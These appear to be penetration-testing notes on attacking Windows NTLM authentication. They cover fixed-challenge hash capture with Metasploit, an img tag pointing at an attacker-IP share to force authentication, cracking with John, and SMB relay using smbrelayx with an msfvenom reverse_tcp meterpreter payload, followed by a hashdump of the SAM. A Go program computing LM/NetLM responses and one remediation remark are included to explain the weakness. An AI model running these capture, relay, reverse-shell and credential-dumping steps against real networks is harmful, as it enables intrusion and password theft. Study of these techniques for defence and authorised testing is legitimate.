NTLM

Reference: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/

NTLM (NT LAN Manager) is what Windows clients use to authenticate to Windows servers. It has mostly been replaced by Kerberos, but it is still used when the client authenticates to a server by IP address or when the client belongs to a different domain. Versions: LM, NTLM, NTLMv2, Kerberos. For backwards compatibility, LM hashes (DES-based) may sometimes still be stored and sent in the NTLM protocol.

NTLM is a challenge/response protocol with three message types: Negotiation, Challenge, Authentication.
Negotiation: Client sends the clear-text username.
Challenge: Server generates a challenge and sends it to the client.
Authentication: Client encrypts the challenge with the hash of the user's password and returns the result to the server.

Killchain combos:
Responder, ntlmrelayx
Responder, MultiRelay, msf (tools)
mitm6, ntlmrelayx
Responder, crack hash, login/dump AD
Responder, crack hash, kerberoast ?
Responder, empire

The vulnerability here is in catching the authentication (challenge response) message. We can capture it either by sniffing as a MiTM or by impersonating a server and getting the client to connect to us.

MiTM:

Impersonation (LM or NTLMv1):
Set up a listening SMB service and send a fixed challenge string to clients. MSF has a module to do this for us:

MSF:
> use auxiliary/server/capture/smb
In the options set: CHALLENGE = 1122334455667788 and JOHNPWFILE = hashpwd
//the first is our challenge string and the second tells msf to save the hashes to a file in john format for cracking later.

The challenge acts as a salt; because we use a fixed, common challenge, the captured responses can easily be cracked with rainbow tables.

We then need to make the client initiate the NTLM protocol. Easiest with SMB: we can embed “\\SERVER_IP\\SHARE” into an email or webpage. ex:
<img src="\\ourAttackerIP\\ADMIN$">
When our page is opened:

Note the hashes are different. This is because LM is also enabled. If both the LM and NT hashes are the same then LM is disabled. For passwords shorter than 7 characters the last 8 bytes will always be 2f85252cc731bb25, since the last key block of the hashing algorithm is all 0's for padding. The file should be saved as hashpwd_netntlm. Crack the output in John:
#john --format=netlm hashpwd_netntlm
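To make the two observations above concrete (the constant tail for short passwords, and why a fixed challenge lets precomputed tables work), here is an added Go program that is not part of the original notes: it computes the LM hash and the NetLM challenge response exactly as a legacy client would, using the fixed 1122334455667788 challenge. The sample passwords are constructed; the program uses only Go's standard library DES.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// Expand a 7-byte key to DES's 8-byte form; DES ignores the low parity bits, left at 0.
func desKeyFrom7(k []byte) []byte {
	return []byte{
		k[0] & 0xFE, (k[0]<<7 | k[1]>>1) & 0xFE, (k[1]<<6 | k[2]>>2) & 0xFE,
		(k[2]<<5 | k[3]>>3) & 0xFE, (k[3]<<4 | k[4]>>4) & 0xFE,
		(k[4]<<3 | k[5]>>5) & 0xFE, (k[5]<<2 | k[6]>>6) & 0xFE, (k[6] << 1) & 0xFE,
	}
}
// Encrypt one 8-byte block under a 7-byte key (NewCipher only fails on a bad key length).
func desEncrypt(key7, block []byte) []byte {
	c, _ := des.NewCipher(desKeyFrom7(key7))
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}
// LMHash: uppercase, pad/truncate to 14 bytes, DES-encrypt "KGS!@#$%" under each 7-byte half.
// A password of 7 chars or fewer leaves the second half zero, so that hash half is always aad3b435b51404ee.
func LMHash(password string) []byte {
	p := make([]byte, 14)
	copy(p, strings.ToUpper(password))
	magic := []byte("KGS!@#$%")
	return append(desEncrypt(p[:7], magic), desEncrypt(p[7:], magic)...)
}
// NetLMResponse: pad the 16-byte LM hash with 5 zero bytes, split the 21 bytes into three
// 7-byte DES keys and encrypt the challenge with each. The third key is 2 hash bytes plus
// zeros, so under a fixed challenge the last 8 bytes are identical for every short password.
func NetLMResponse(password string, challenge []byte) []byte {
	h := make([]byte, 21)
	copy(h, LMHash(password))
	var resp []byte
	for i := 0; i < 3; i++ {
		resp = append(resp, desEncrypt(h[i*7:i*7+7], challenge)...)
	}
	return resp
}
func main() {
	challenge, _ := hex.DecodeString("1122334455667788") // fixed challenge used in the notes
	for _, pw := range []string{"", "abc", "Passw0rd!"} { // constructed sample passwords
		fmt.Printf("%-12q LM=%x NetLM=%x\n", pw, LMHash(pw), NetLMResponse(pw, challenge))
	}
}
```

Because the response is a deterministic function of the LM hash and the challenge, every host that still sends LM responses to a fixed challenge exposes a table-lookup problem rather than a cracking problem; raising the LAN Manager authentication level so that LM responses are never sent removes it.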

//if this method does not work to crack the hash then we need to use a rainbow-table cracking tool set like rcracki_mt (crack the first part), halflm_second.rb (msf, get the next part), netntlm.pl (go from the all-caps password to the real password)

----NTLMv2-----(Need to pass / SMB relay):

--summary--

For this to work we need:
1) Admin on the target machine.
2) "Network security: LAN Manager authentication level" set to “Send LM & NTLM responses”

//in some situations it may still work without this.
----
MSF:
> use exploit/windows/smb/smb_relay

Once we run it we just need to sit and wait for a connection. This could come from updates, patch management, or backups. Once a connection attempt is made the tool will auto-pwn for us.

Impacket:
Here we will utilize smbrelayx.py from impacket and catch the msfvenom shell with an msf meterpreter session.
#msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4455 -f exe -o smbexp.exe
msf> use exploit/multi/handler

run the listener.
#smbrelayx.py -h 192.168.102.149 -e /home/stduser/smbexp.exe
//now wait for a host to try a connection. We will see the session open in msf when it works.

-------------- Dump SAM:
//We already have a SYSTEM shell. On some OSes this will also work with admin shells.
meterpreter> run hashdump
//If we get an "operation failed" message, try to migrate to another process and then attempt "run hashdump" again.
